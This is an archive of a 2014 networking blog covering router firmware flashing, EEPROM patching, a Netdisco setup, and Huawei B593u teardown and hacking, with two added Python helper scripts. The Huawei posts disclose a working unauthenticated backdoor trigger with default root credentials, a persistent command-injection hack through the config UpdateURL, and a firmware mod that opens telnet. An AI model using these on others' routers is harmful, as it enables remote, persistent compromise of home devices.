Saturday, November 22, 2014

Topfield TF500PVRc with TF510PVRc or TF520PVRc firmware

Latest firmware for Topfield TF500PVRc is 3.56 from 2010 while for TF510PVRc and TF520PVRc there's 3.96 from 2013.

Can you flash Topfield TF510PVRc / TF520PVRc firmware to the older TF500PVRc? Yes, yes you can, after changing the SysID with VegaPack, and it will start and appear to work just fine. However, since the TF500PVRc has only 32MB RAM, the system will quickly run out of memory. First menus will disappear and soon the entire system crashes.

Flashing newer model firmware "works" only for DVB-C models. In DVB-T models (TF500PVRt / TF510PVRt / TF520PVRt) the tuner was changed, and while the OS will run it won't be able to receive any channels.

Thursday, November 20, 2014

Buffalo WLAE-AG300N, OpenWrt Barrier Breaker and auto power on

While looking for something else I spotted a Buffalo WLAE-AG300N "range extender" in the IT "treasure room". Noticing it's OpenWrt supported, I decided to give it a try.

- Download OpenWrt
- Power-on Buffalo
- Wait few minutes
- Press and hold reset button until status led turns red and flashes
- Wait few minutes
- Set IP of PC to, mask, no gateway, no DNS
- Connect PC to left Ethernet port on Buffalo (looking from connector side with shiny side facing up)
- Ping - if it doesn't answer you failed
  (Manual claims default IP is, but actually it's
- Open in browser and login as "root" without password
- Click Update AirStation firmware
- Upload OpenWrt image just downloaded
- Wait few minutes until Status led turns solid green
- Change network settings on PC to DHCP client
- Ping - if it doesn't answer you failed AGAIN!
- Open in browser and login as "root" without password
- Rest is as with any other OpenWrt device
- With OpenWrt left ethernet port is LAN, right is WAN. You can of course change this - unless you keep failing ONCE AGAIN!

By far the DUMBEST thing with this device is that it defaults to the power off state. Meaning if you want to use it you must press the power button and wait for it to start. What kind of moron engineered that? Maybe someone who's a big fan of the Linksys NSLU2 that suffered from the same problem ten years ago.

No worries, as there's a workaround - all you need to do is somehow ensure the power button is always pressed down. Simply put a couple of drops of superglue on the sides of the power button, wiggle it a bit so the glue wicks between frame and button and then keep the button pressed down until dry. Now the device is in a permanently powered on state, which isn't a bad idea especially since with OpenWrt it's not possible to shut down this device by pressing the power button. Instead the kernel will hang while the device stays powered up.

Sunday, November 16, 2014

Cisco CSR1000v 3.13 finally working on VMware ESXi 5.1

After many, many months of waiting Cisco finally managed to build a new version of CSR1000v 3.13 that is compatible with VMware ESXi 5.1. Another quiet release without release notes. As with earlier 3.13 versions this new 03.13.01S build is available only in OVA format without purchasing a license (csr1000v-universalk9.03.13.01.S.154-3.S1-ext.ova). Not to worry, as you can extract the ISO image and even the BIN images if needed for upgrading an older install from OVA.

If you're coming from 3.12 or older with an eval license (which allowed creation of the eval license locally) you'll need new licenses. The usual two month license is available from the Cisco portal, but it's an extra step compared to 3.12.

Another difference is the performance levels for unlicensed and eval licensed modes. Unlicensed 3.12 is 2,5Mbit/s, eval licensed 3.12 is 50Mbit/s, unlicensed 3.13 is 0,1Mbit/s and eval licensed 3.13 is 10Gbit/s.

Wednesday, November 05, 2014

Upgrading HP Proliant firmware is easy... NOT!

The server in question was an HP Proliant DL320 G6 from 2010 without any firmware upgrades ever made. Those old versions have multiple known issues: usability, stability and hardware component compatibility related. Downtime required to perform these steps will be around 3 hours.

One might assume upgrading is as simple as booting the latest HP SPP (HP Service Pack for Proliant) ISO image using the ILO2 remote console and virtual media. Not quite. It'll just get stuck at a pulsing HP logo with a blue bar at the bottom of the screen. So here are some notes on how I got this working after spending too many hours testing and hunting for upgrades from the Internet that HP is no longer offering on their website for old servers that are out of warranty.

First you need to upgrade the ILO2 firmware. You can't do it using a web browser since the old firmware is broken and the upgrade process gets stuck at 99%. I couldn't use the Windows flasher either as this server is running VMware ESXi. Even with an old browser and old Java, virtual media redirection is unusably slow due to floods of TCP retransmissions, so there's no possibility of booting from removable media using ILO to upgrade ILO. So we have to do it using SSH:

1. Download ILO2 firmware upgrade ilo2_225.bin and place it on HTTP server accessible from your management network
2. Connect to ILO using SSH with same login and password you have set for web access
3. Type "cd map1/firmware1"
4. Start firmware upgrade by typing "load -source"
5. Wait around 10 minutes for upgrade to complete
6. Login using web browser and confirm that ILO2 is now running firmware 2.25

Next we need to use the old "Smart Update Firmware DVD Proliant Support Pack v10.10" from 2012 because the newer SPP is not compatible with older firmwares. Don't even think about using the automatic upgrade either, like the Firmware DVD suggests when booting from the ISO image, as it will just end up stuck in an X11 desktop with the default cursor. Instead use manual mode and click through dozens of Next Next Next dialogs. This may downgrade ILO2 to 2.09, which should be ok as the virtual media problem was fixed in 2.01.

Now we can finally boot from the latest SPP 2014.09 (HP_Service_Pack_for_ProLiant_2014.09.0_792934_001_spp_2014.09.0-SPP2014090.2014_0827.10.iso) ISO image. If your server is G5 or older use SPP 2014.06 (HP_Service_Pack_for_Proliant_2014.06.0_784915_001_spp_2014.06.0-SPP2014060.2014_0618.4.iso) instead. If you feel lucky you can try the automatic upgrade option on the boot menu. Surprisingly it did work for me.

Link to tools of trade.

Thursday, October 09, 2014

LTE 450MHz performance

Seems Ukkomobile has fixed their provisioning setup. The LTE network itself came up last week, but only DNS traffic was allowed and all tcp/80 traffic was hijacked into an infinite 302 redirect loop between and

Signal strength seems to be ok, getting 4 of 5 bars on leds and diagnostics page of Huawei router shows RSRP -92 dBm, RSRQ -5 dBm, SINR 9.0 dB and RSSI -75 dBm.

So it was time for a quick benchmark. Speed is a steady 3,5Mbit/s in and exactly the same 3,5Mbit/s out. Latency without load ~20ms and while transferring data ~120ms.

Client devices get IP from Huawei router gets private IP from subnet from ISP which is then natted by provider to IP from range. Double NAT - I don't like it but that's how it is these days. Subnet is Fujitsu Finland service network and based on whois registered for Onninen Oy. Unless there's some unpublished deal between Onninen and Ukkomobile that part might be outdated information on whois registry.

DNS servers used are Google Public DNS (, Also the connection doesn't seem to be completely transparent. Trying to test the performance of the connection using Ookla always fails in the upstream test. Either the preconfigured Huawei router Ukkomobile sent or something in their network is causing problems.

The cardboard box the Huawei router arrived in had a sticker on the side saying it's nn of 490 shipped from China to Ukkomobile. Since each box holds six routers, with the assumption that all boxes contained the same equipment there's at least 6*490 = 2940 of these devices destined for the Finnish market.

Friday, October 03, 2014

Inside Ukkomobile 450MHz LTE router - Huawei B593s-31A

450MHz LTE is alive!

Ukkomobile aka Ukkoverkot is currently building a 450MHz LTE network in Finland. I received one of the CPEs they use and it turned out to be a Huawei B593s-31A with V100R001C01SPC002 firmware dated 2014-09-12. This is an Android based device, unlike the B593u which is more traditional embedded Linux based on Broadcom code.

Since it's LTE there's a SIM card like in any other 2G/3G/4G WWAN router. APN name is UkkoNet, MNC is 035 and MCC 244. Login admin, password admin and an encrypted configuration file, just like B593u and other B593s revisions.

The internal construction of the B593s series is also quite different from older routers. There's a small brains board with the HiSilicon chip, some flash and the RF side. The mainboard has Broadcom Wifi, Marvell Ethernet, some VoIP FXS chips and the power supply.

Board photos and chip markings:

- BCM43236BKMLG, HE1423 P21
- 32178-FM1, 1419BLK0FY
- MARVELL 88E6071-NNC2, EP2119.5JW
- DIAG connectors
- Hi6451GBC, 110CN1414, CP2071414
- 77192-14, 5541269
- Mainboard connector
- HiSilicon Balong Hi6920, Hi6920GFC, 100, HP2561412
- SK hynix, H9DA4VH2GJAM, CR4EM 352A
- ANALOG DEVICES, AD80277BBCZ, #1347, 2738745.1
- PCA9555, CDW012

Saturday, September 27, 2014

Cisco CSR1000v 3.13 crashes on VMware ESXi 5.1

The initial version of Cisco CSR1000v 3.13 (csr1000v-universalk9.03.13.00.S.154-3.S-ext) was broken and kept crashing while booting on VMware ESXi 5.1, but apparently does work on ESXi 5.5. Cisco has silently replaced it with the 3.13S0a version (csr1000v-universalk9.03.13.00a.S.154-3.S0a-ext) without providing any release notes or even updating the file dates. Which is exactly as broken as the old one - stuck in an infinite reboot loop.

Download is here, but for some reason for 3.13 only the OVA packaged one is available after free registration. If you need the ISO simply unpack the OVA with 7zip and use the ISO you can find inside for the install.

And then it will fail. Perhaps something to do with the crazy nested virtualization CSR uses. Thanks guys.

Monday, September 01, 2014

Export all SMTP addresses from Exchange using PowerShell

Tested with Exchange 2010. You'll need the Exchange Management Shell, but no need for Exchange admin rights.

Get-Recipient -ResultSize unlimited | Select Name -ExpandProperty EmailAddresses | Where-Object {$_.SmtpAddress -ne $null} | Select Name,SmtpAddress,IsPrimaryAddress | Export-csv -Encoding unicode -NoTypeInformation AllEmailAddress.csv

Sunday, August 31, 2014

How to change Atheros AR9xxx aka ath9k EEPROM values

One of my Atheros AR9280 minipcie cards had some odd undefined regulatory domain (0x6B) configured. This caused even the latest Linux ath9k driver to break, so I wanted to change it to a valid regdom. Which ath9k developers think is a sin and are trying to prevent people from doing, but luckily our old friend iwleeprom has Atheros support letting us fix this.

# The usual preparations
apt-get update
apt-get -y install git subversion build-essential

# Download atheros branch of iwleeprom and compile it
mkdir -p /opt/iwleeprom
cd /opt/iwleeprom
svn checkout atheros
cd atheros

# Shutdown wifi
ifdown wlan0

# Find PCI ID of your device using lspci
lspci | grep -i atheros

# Mine was 03:00.0
# 03:00.0 Network controller: Qualcomm Atheros AR928X Wireless Network Adapter (PCI-Express) (rev 01)

# Init card
./iwleeprom -d 0000:03:00.0 -I

# Verify that card is properly identified
./iwleeprom -d 0000:03:00.0 -s

# Backup current eeprom content
./iwleeprom -d 0000:03:00.0 -o original.bin

# Patch country code from non-standard 0x6B to WOR5_ETSIC 0x65
cp original.bin etsic0x65.bin
echo -ne '\x65' | dd of=etsic0x65.bin bs=1 seek=520 conv=notrunc

# Program patched eeprom back to device
echo Y|./iwleeprom -d 0000:03:00.0 -i etsic0x65.bin

# Verify that regdom was changed
# Take note of last CRC line as this is new CRC we need
# For example "CRC (eval)  : fb27"
./iwleeprom -d 0000:03:00.0 -s

# Patch eeprom to use proper CRC
# You need to reverse the byte order here: the 16-bit field at offset 514 is
# little-endian, so CRC fb27 is written as the bytes 27 fb
cp etsic0x65.bin etsic0x65crc.bin
echo -ne '\x27\xfb' | dd of=etsic0x65crc.bin bs=1 seek=514 conv=notrunc

# Program crc patched eeprom back to device
echo Y|./iwleeprom -d 0000:03:00.0 -i etsic0x65crc.bin

# Verify that crc matches now
./iwleeprom -d 0000:03:00.0 -s

# Export changed eeprom content
./iwleeprom -d 0000:03:00.0 -o new.bin

# Ensure what we wrote and read match
md5sum etsic0x65crc.bin new.bin

# Reload ath9k.ko
rmmod ath9k
modprobe ath9k

# Turn wifi back on
ifup wlan0

# Check dmesg for more details
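An added example, not from the post or from iwleeprom, that does the regdomain patch and the CRC fix-up above in one step instead of two dd runs and a second programming pass. It assumes the ar5416 EEPROM layout ath9k uses for the AR9280: base header at byte 0x200 of the dump (which is why the post seeks to 514 and 520), 16-bit little-endian fields, and a checksum word chosen so that the XOR of all header words is 0xffff; that iwleeprom's "CRC (eval)" is this same value is an assumption too, as is the 4 KiB sample dump constructed inside.

```python
import random
import struct
import sys

# Layout assumed from ath9k's ar5416_eeprom_def (AR9280 and friends): the base header
# lives at byte 0x200 of the dump. 16-bit little-endian fields, relative to the header:
#   +0 length (bytes), +2 checksum, +4 version, +8 regDmn[0]  -> bytes 514 and 520 above.
BASE_OFF = 0x200
LEN_OFF = BASE_OFF + 0
CSUM_OFF = BASE_OFF + 2
VER_OFF = BASE_OFF + 4
REGDMN_OFF = BASE_OFF + 8
WOR5_ETSIC = 0x65  # the regdomain the post switches to


def _nwords(blob):
    """Number of 16-bit words the checksum covers: baseEepHeader.length bytes,
    capped at what is actually in the dump (ath9k caps at the size of its struct)."""
    length = struct.unpack_from("<H", blob, LEN_OFF)[0]
    return min(length, len(blob) - BASE_OFF) // 2


def header_xor(blob):
    """XOR of every covered word, checksum field included. A valid EEPROM gives 0xffff."""
    acc = 0
    for i in range(_nwords(blob)):
        acc ^= struct.unpack_from("<H", blob, BASE_OFF + 2 * i)[0]
    return acc


def checksum_ok(blob):
    return header_xor(blob) == 0xFFFF


def fix_checksum(blob):
    """Return a copy whose checksum word makes header_xor() come out as 0xffff."""
    out = bytearray(blob)
    struct.pack_into("<H", out, CSUM_OFF, 0)          # take the old checksum out of the XOR
    struct.pack_into("<H", out, CSUM_OFF, header_xor(out) ^ 0xFFFF)
    return bytes(out)


def regdomain(blob):
    return struct.unpack_from("<H", blob, REGDMN_OFF)[0]


def checksum_word(blob):
    return struct.unpack_from("<H", blob, CSUM_OFF)[0]


def set_regdomain(blob, regdmn):
    """Patch regDmn[0] and re-checksum. struct's '<H' does the byte swapping the post
    does by hand (CRC 0xfb27 becomes the bytes 27 fb)."""
    out = bytearray(blob)
    struct.pack_into("<H", out, REGDMN_OFF, regdmn)
    return fix_checksum(bytes(out))


def make_sample_dump(regdmn=0x6B, seed=1):
    """Constructed 4 KiB dump (not from a real card): random calibration words, header
    length 0x60, the post's odd regdomain 0x6B and a valid checksum."""
    rng = random.Random(seed)
    blob = bytearray(rng.getrandbits(8) for _ in range(4096))
    struct.pack_into("<H", blob, LEN_OFF, 0x60)
    struct.pack_into("<H", blob, VER_OFF, 0x0E01)   # constructed version value
    struct.pack_into("<H", blob, REGDMN_OFF, regdmn)
    return fix_checksum(bytes(blob))


def patch_dump_file(src, dst, regdmn=WOR5_ETSIC):
    """original.bin -> patched file. Refuses a dump whose checksum does not verify,
    which usually means another layout or a dump taken at the wrong offset."""
    with open(src, "rb") as f:
        blob = f.read()
    if not checksum_ok(blob):
        raise ValueError("%s: header checksum does not verify (XOR=%04x)" % (src, header_xor(blob)))
    new = set_regdomain(blob, regdmn)
    with open(dst, "wb") as f:
        f.write(new)
    return regdomain(new), checksum_word(new)


if __name__ == "__main__":
    # usage: eeprom_regdmn.py original.bin etsic0x65crc.bin [regdomain-hex]
    rd = int(sys.argv[3], 16) if len(sys.argv) > 3 else WOR5_ETSIC
    new_rd, csum = patch_dump_file(sys.argv[1], sys.argv[2], rd)
    print("regdomain now 0x%02x, checksum word 0x%04x" % (new_rd, csum))
```

Programming the result back is still the iwleeprom -i step above; the script only produces the file and refuses to touch a dump it cannot verify.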

Saturday, August 30, 2014

Modifying Huawei B593u firmware images using FMK

Nothing special here in my opinion, but I've seen a few comments saying that FMK doesn't work with the Huawei B593u. Just follow the instructions below and you end up with a normal firmware image having one important difference - you can telnet in as admin from the LAN side of the device.

This is for the latest T-Mobile firmware SP106, but adjust the firmware identifiers and it'll work for others as well.

# Install some tools needed
sudo apt-get update
sudo apt-get -y install git build-essential zlib1g-dev liblzma-dev python-magic zip unzip

# Download and compile fmk
mkdir -p ~/fmk
cd ~/fmk
git clone
cd firmware-mod-kit/src

# Download and unpack B593u firmware
mkdir -p ~/fmk/106
cd ~/fmk/106
wget ""
tar xvf V100R001C748SP106.tar.bz2 

# Extract trx
~/fmk/firmware-mod-kit/ B593.trx 

# Make backup of file we're going to patch
cp -a fmk/rootfs/bin/cms fmk

# Allow inbound telnet from LAN
# Make sure your replacement string is exactly same length as original!
sed fmk/rootfs/bin/cms -i \
    -e's|iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null|iptables -I INPUT -s -j ACCEPT ##################|g'

# Check that original and modified binaries are same size but have different date stamps
ls -l fmk/cms fmk/rootfs/bin/cms

# Remove some unnecessary files to shrink squashfs image and keep fmk happy
rm -f fmk/rootfs/sbin/mkntfs

# Update version string in headers so device already running SP106 will accept our customized version
sed -i.bak fmk/image_parts/header.img \

# Rebuild trx

# Create new firmware archive
mv fmk/new-firmware.bin B593.trx
chmod 0644 B593.trx modem.bin help.tar.bz2 B593-small.trx
tar --owner=LTECPE --group=LTECPE -cvjf V100R001C748SP106_TELNET.tar.bz2 B593.trx modem.bin help.tar.bz2 B593-small.trx

# Cleanup
sudo rm -rf fmk

Done, upload V100R001C748SP106_TELNET.tar.bz2 to your router.

After the firmware upgrade simply telnet from LAN to the router. Usually the first attempt fails with connection refused, but try again after a few seconds and it'll work. Login as "admin" with password "HW4GCPE". When in the ATP prompt type "shell" to open a root shell.

Almost the same procedure works for the B593u-91, although as I don't have a u91 the resulting firmware has not been tested.

mkdir -p ~/fmk/u91
cd ~/fmk/u91
tar xvf u91_r+m+h+s.tar.bz2
~/fmk/firmware-mod-kit/ B593.trx 
cp -a fmk/rootfs/bin/cms fmk
sed fmk/rootfs/bin/cms -i \
    -e's|iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null|iptables -I INPUT -s -j ACCEPT ##################|g'
ls -l fmk/cms fmk/rootfs/bin/cms
rm -f fmk/rootfs/sbin/mkntfs
sed -i.bak fmk/image_parts/header.img \
mv fmk/new-firmware.bin B593.trx
chmod 0644 B593.trx product_info modem.bin help.tar.bz2 B593-small.trx
tar --owner=LTECPE --group=LTECPE -cvjf V100R001C00SP053_TELNET.tar.bz2 B593.trx modem.bin product_info help.tar.bz2 B593-small.trx
sudo rm -rf fmk

Thursday, August 28, 2014

Inside old Motorola (Symbol) AP-5131 access point

I found a couple of Motorola AP-5131 802.11a/g access points today. It's an old design from Symbol Technologies dating back to 2005, with a manufacturing date from 2010.

Looks like those APs had a very decent design and hardware specs, especially for something that old. It's running MontaVista Linux with kernel 2.4.30. Intel Xscale 425 at 266MHz, 64MB RAM, 64MB flash, 2MB bootflash, two 100Mbit/s Ethernet interfaces (Altima AC101L MII PHY), 802.3af PoE support and two minipci slots. WLAN is the rare Intersil / Conexant GW3888.

The bootloader is something custom Symbol built. With JTAG pins on board, and what overall seems like the Intel reference design just in a different shape, it should be fairly easy to run OpenWrt on this. Figure out how the GPIOs are mapped, replace the bootloader with RedBoot and that's about it. The stock bootloader might be fine as well; I haven't really looked, as this is old and there's only two of them, so not really that interested myself. Especially since there are no drivers for the WLAN.

Board photos:

- Top side
- Bottom side
- Intel Xscale IXP425 CPU
- 2 * 32MiB RAM
- 64MiB NAND flash for OS
- 2MiB NAND flash for bootloader
- Intersil / Conexant GW3888 based WLAN
- Intersil ISL3692 radio

Complete set of images here.

Win95 / NT4 / 2000 / XP drivers for the WLAN card are available from Microsoft. Some ancient FreeBSD drivers claim to support the ISL3888 (which is the same as GW3888), but I have some doubts whether that's actually true. The Intersil / Conexant codename for the 3888 is "Isotope"; this was in the Motorola / Symbol AP-300 release notes, as apparently the AP-300 was upgraded from regular Prism54 to "Isotope" at some point.

Saturday, August 23, 2014

Netdisco2 on Ubuntu 14.04

Netdisco is a neat tool to collect the layer-2 forwarding database from switches, match MACs with the layer-3 ARP table from the router and present it over a searchable webui.

The old "Netdisco 1" was quite horrible to set up, but it did still do its job. Recently "Netdisco 2" was released, making admins' lives much easier and also bringing a fancy new look for the webui.

So here are my notes about installing a new virtual machine with Netdisco 2.

# Install Ubuntu 14.04.1 LTS Server x64 with defaults

# After install login and switch to root
sudo su -

# Update system
apt-get update
apt-get -y dist-upgrade

# Add some basic tools we like
apt-get -y install openssh-server open-vm-tools build-essential joe wget screen lftp mtr-tiny zip ntp

# Get rid of some spyware
apt-get -y remove popularity-contest

# Disable IPv6 support on next reboot
echo "net.ipv6.conf.all.disable_ipv6=1" >>/etc/sysctl.conf

# Install caching DNS server to reduce and speedup DNS queries sent when Netdisco is operating
apt-get -y install dnsmasq

# Generate config file for dnsmasq
cat <<'__EOF__' >/etc/dnsmasq.d/custom.conf

# Remove DNS breaking resolvconf package
apt-get -y remove resolvconf

# Fix DNS resolver settings to use local DNS first with Google and OpenDNS as fallback
# Normally I wouldn't use OpenDNS but I'm giving them new chance now that they stopped
# hijacking NXDOMAIN queries.
cat <<'__EOF__' >/etc/resolv.conf
options timeout:5

# Don't mess with resolv.conf via /etc/network either
sed -i.bak -e's|dns-|#dns-|g' /etc/network/interfaces

# Restart dnsmasq so our changes are activated
service dnsmasq restart

# Install Netdisco deps
apt-get -y install libdbd-pg-perl libsnmp-perl postgresql pgtune fping

# PostgreSQL configuration for better performance, defaults are good for Pentium Pro at 200MHz
mv /etc/postgresql/9.3/main/postgresql.conf /etc/postgresql/9.3/main/postgresql.conf.old
pgtune -i /etc/postgresql/9.3/main/postgresql.conf.old -o /etc/postgresql/9.3/main/postgresql.conf

# Switch to postgres user and create new SQL user
su - postgres
createuser -DRSP netdisco
# Enter some password here
createdb -O netdisco netdisco

# Switch back to root
exit

# Netdisco install based on instructions from

# Add new user account for Netdisco
adduser netdisco --shell /bin/bash --disabled-password --gecos netdisco

# Switch to netdisco user and install required perl components under user homedir
su - netdisco
curl -L | perl - --notest --local-lib ~/perl5 App::Netdisco

# Create some links
mkdir ~/bin
ln -s ~/perl5/bin/{localenv,netdisco-*} ~/bin/

# Test install
~/bin/netdisco-daemon status

# Create config file with your postgresql username and password, default SNMP communities etc.
# See examples in ~/perl5/lib/perl5/auto/share/dist/App-Netdisco/environments/deployment.yml
cat <<'__EOF__'>~/environments/deployment.yml
  name: 'netdisco'
  user: 'netdisco'
  pass: 'S3cretForYouAndMe'
safe_password_store: true
  - tag: 'default_1'
    community: 'notsopublic'
    read: true
    write: false
  - tag: 'default_2'
    community: 'public'
    read: true
    write: false
     when: '5 1,7,13,19 * * *'
     when: '35 1,7,13,19 * * *'
     when: '45 1,7,13,19 * * *'
     when: '55 1,7,13,19 * * *'
     when: '15 23 * * *'
  max_outstanding: 50
  tasks: 'AUTO * 5'

# Build initial database
# You will be asked for webui admin credentials etc.

# Create script to start Netdisco
cat <<'__EOF__' >~/
~/bin/netdisco-web start
sleep 5
~/bin/netdisco-daemon start
chmod a+x ~/

# Launch it

# Verify functionality with browser by opening
# Login using admin account just created
# Enter IP of switch or router to add and click discover
# If you have proper SNMP communities and LLDP/CDP settings in place it should discover entire site straight away

# Return to root shell
exit

# Autostart netdisco after reboot
echo "( sudo su - netdisco -c '/home/netdisco/' ) &" >/etc/rc.local

# Following steps are needed only if you don't have SNMP read access to upstream router
# but have Linux server in subnet you want to monitor.

# Enable local SNMP server
apt-get -y install snmpd
mv /etc/snmp/snmpd.conf /etc/snmp/snmpd.conf.old
cat <<'__EOF__'>/etc/snmp/snmpd.conf
rocommunity notsopublic
sysservices 79
# only listens on lo interface assuming this is same host that Netdisco is running

# Fix logging, otherwise syslog is flooded with bogus errors
sed -i.bak /etc/default/snmpd -e's|Lsd|LS6d|g'

# Restart snmp
service snmpd restart

# Because we don't have SNMP read rights to ISP router we must keep local ARP table populated manually
fping -g   -b 24 -c 1 -B 1 -p 25 -q -r 1 -t 100

# Discover via Netdisco webui next

# Schedule fping to run slightly before arpnip/arpwalk
cat <<'__EOF__' >>/etc/crontab
# arpwalk is scheduled in deployment.yml as when: '45 1,7,13,19 * * *', so run fping one minute earlier
44 1,7,13,19 * * * fping -g   -b 24 -c 1 -B 1 -p 25 -q -r 1 -t 100 >/dev/null 2>/dev/null

# Restart cron
service cron restart

# Now would be good time to restart server so all changes are applied and to make sure Netdisco 
# will come up after boot.

# Later to install netdisco updates
# (Take backup first.. of course)

# Switch to netdisco user
sudo su - netdisco

# upgrade Netdisco
~/bin/localenv cpanm --notest App::Netdisco

# apply database schema updates

# restart web service
~/bin/netdisco-web restart

# restart job daemon
~/bin/netdisco-daemon restart

Tuesday, August 19, 2014

Huapwn - Backdoor on your Huawei B593u

The public Huawei document I linked a couple of days ago mentioned a factory diagnostics tool called "Huawei deviceLocker V0.1" that will grant access to a root shell on the router. I got curious about how this would actually work and came to the conclusion it must be something extremely simple and insecure, it IS Huawei after all. After some poking around the /bin/web process I figured it out - it's all there in clear text for anyone to read. And that admin password is in Huawei docs, not exactly secret either. In case you didn't realize, there's no need for authentication to exploit this. Protip: Try to hide your backdoors a bit better next time.

# Send magic packet that enables telnet, timeout error is expected
curl -m5 \
-d "switch=0&handshakeFlag=zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq" \

# if telnet says connection refused keep trying every few seconds, it'll work
# if telnet just hangs and timeouts then port is not open and no point retrying with telnet
# login: admin
# pass: HW4GCPE
# type "shell" or "sh" to open root shell

To be fair Huawei is at least trying, since this backdoor HAS been closed recently. Not that I could find any public disclosure about exactly this hole. The B593u is a rather common device (at least in Europe) and most operators still only distribute old firmware versions where this hole is present.

Polkomtel SP103 and T-Mobile SP102/SP104/SP105 (which are the latest known firmwares for the B593U-12) have a slightly different /bin/web binary than older builds. Newer versions still have the same backdoor function present using the same "handshake", but portconfig.cgi is no longer in the list of accepted URLs. It's not an actual CGI; /bin/web simply has a list of URLs and which internal functions to trigger for them. This list has been edited to either remove this backdoor, or worse, to hide it and still allow triggering it in some other way.

So unless you're willing to take the risk of flashing unsupported firmware customized for another operator, your router is just waiting to be hacked. Hacked permanently, that is.

Combined with the persistent hack I posted a few hours ago, malicious hackers could seriously own the device and not even a factory reset paired with a full firmware upgrade can help you. Or have you seen many anti-rootkit tools for routers lately?

Persistent customizations to Huawei B593u with stock firmware

Perhaps you're fairly satisfied with the Huawei stock firmware but would like to fix some security problems and remove the spyware installed at the factory. There's a fairly easy way to do this.

You need root level access to a shell on the device via one of the many vulnerabilities present. This one is easy. Compiling new binaries with the stock Broadcom toolchain is easy as well. The problem is how to make them persistent so the customizations made are loaded when the device is rebooted.

The answer is actually quite simple. Create a script under /upgflash - which is a 256MB USB flash device embedded inside the router. Let's be creative and call this script "rc.local". Inside the script put the following two lines:

/bin/iptables -I INPUT -s -j ACCEPT

Make the script executable. This will after each reboot grant you telnet access to the device from the internal subnet (assuming the default IP range).

Export current configuration from flash to /tmp/flashinfo.bin.
flashtest export e00000 262144

Load the file in a hex editor and search for "HttpUpg UpdateURL". Depending on your location it'll be something like "". Replace this with ";/upgflash/rc.local;". Just make sure to keep the string length intact so you don't have to update the content length info at the beginning of flashinfo.bin. DO NOT MAKE THE FILE BIGGER THAN 262144 BYTES, OTHERWISE YOU'LL END UP OVERWRITING THE FACTORY DEFAULT CONFIG -> DEAD DEVICE NEXT TIME YOU DO A FACTORY RESET.

Write modified configuration back to device
flashtest load flashinfo.bin e00000

Reboot with force to make sure our config stays
reboot -f

What this does is trick the system into executing the /upgflash/rc.local script on every reboot instead of sending your device and SIM information to Huawei.

You can safely use around 100MB of /upgflash without running the risk of breaking things when doing firmware upgrades. This modification will also persist between firmware upgrades, although I highly recommend doing a factory reset, then the upgrade and then adding the hacks back. For example you don't want to mess with the modem firmware upgrade process and end up bricking it.

What to do with this hack? As said, compile binaries with the Broadcom toolchain and use them. Perhaps even a chrooted mipsel Debian on a USB stick so you don't have to be limited to the Huawei world.

Unlike major modifications such as replacing the stock firmware with OpenWrt, this will let you keep the stock features while also making it possible to add new customizations.


It's possible to compile working binaries with the toolchain from an Asus router using the same chipset. The below works for Ubuntu 14.04 x64.

apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 unzip
mkdir -p /opt/asus
cd /opt/asus
cd GPL_RT_N53_30043744561
tar xvf GPL_RT-N53_3. 
mv asuswrt /opt/
ln -s /opt/asuswrt/tools/brcm /opt/brcm

When compiling:

export PATH=$PATH:/opt/brcm/hndtools-mipsel-linux/bin:/opt/brcm/hndtools-mipsel-uclibc/bin
./configure --build=x86_64-linux-gnu --host=mipsel-linux-uclibc


Saturday, August 16, 2014

Unpacking Huawei B593u compressed Broadcom CFE bootloader

Sorry, one more B593u post but felt this is worth documenting.

While hacking my way into the Huawei B593u I had a big problem with Huawei's crippled CFE bootloader. It was not talking to me, and when I finally did get it to talk to me it was only one way. All I could see was the CFE> prompt after smashing ^C, but nothing else.

I had already dumped CFE from flash by now so I obviously went to check it out, but there was not much to see. So I ran binwalk and it told me CFE contained LZMA compressed data. Ah-ha! The initial bootloader decompresses the LZMA part, which will contain all the juicy bits.

Yet I couldn't unpack this LZMA blob. It was not a total misidentification by binwalk either, clearly compressed data. Maybe it's not LZMA? After some failed attempts I remembered a similar problem with Realtek squashfs a couple of years ago. Back then the problem was due to newer LZMA decompressors being incompatible with the outdated versions all these WiFi SoC vendors love to use.

I was able to extract the Huawei compressed CFE using a binary named "lzma_4k" which is part of the Asus RT-N56U GPL release. I don't have sources for this, so you'll need a Linux system capable of running i386 binaries. Compiling an old enough LZMA SDK might be enough; lzma_4k identifies itself as "LZMA Utility 4.63 : Igor Pavlov : Public domain : 2008-12-31", but no idea how many patches from Broadcom it contains.

# Find offset of compressed CFE
binwalk 0x000000-0x040000.bootloader 

38132           0x94F4          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 219824 bytes

# Skip beginning
dd if=0x000000-0x040000.bootloader bs=38132 skip=1 of=boot.lzma

# Get compatible lzma binary
wget --no-check-certificate ""

# Unpack
lzma_4k d boot.lzma boot

A quick "strings" on the uncompressed boot loader reveals some interesting nvram parameters, namely "console_disable", which we simply set to 0 and like that the serial port comes alive with CFE.
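An added example, not from the post or from binwalk, that finds .lzma stream headers in a dump the way the binwalk line above reports them (offset, properties byte, dictionary size, uncompressed size) and tries Python's liblzma on each, so a blob that needs lzma_4k shows up as "decoded no" instead of a bare error. The sample dump is constructed with that same library, so it does decode; the 64 MiB plausibility bounds and the file name in the usage are assumptions.

```python
import lzma
import random
import struct

HEADER_LEN = 13  # .lzma ("LZMA-alone") header: props(1) dict_size(4 LE) uncompressed_size(8 LE)
UNKNOWN_SIZE = 0xFFFFFFFFFFFFFFFF


def _plausible_dict_size(d):
    """SDK encoders write 2^n or 2^n + 2^(n-1); anything else is almost surely not a header."""
    if d < 4096 or d > 64 << 20:
        return False
    n = d.bit_length() - 1
    return d == 1 << n or d == (1 << n) + (1 << (n - 1))


def parse_lzma_header(buf, off):
    """Decode the 13-byte header at `off`, or None if these bytes cannot be one."""
    if off + HEADER_LEN > len(buf):
        return None
    props, dict_size, usize = struct.unpack_from("<BIQ", buf, off)
    if props >= 9 * 5 * 5 or not _plausible_dict_size(dict_size):
        return None
    pb, rem = divmod(props, 45)          # props = (pb * 5 + lp) * 9 + lc
    lp, lc = divmod(rem, 9)
    if usize == UNKNOWN_SIZE:
        usize = None                     # end-marker stream, what liblzma's encoder writes
    elif usize > 64 << 20:
        return None
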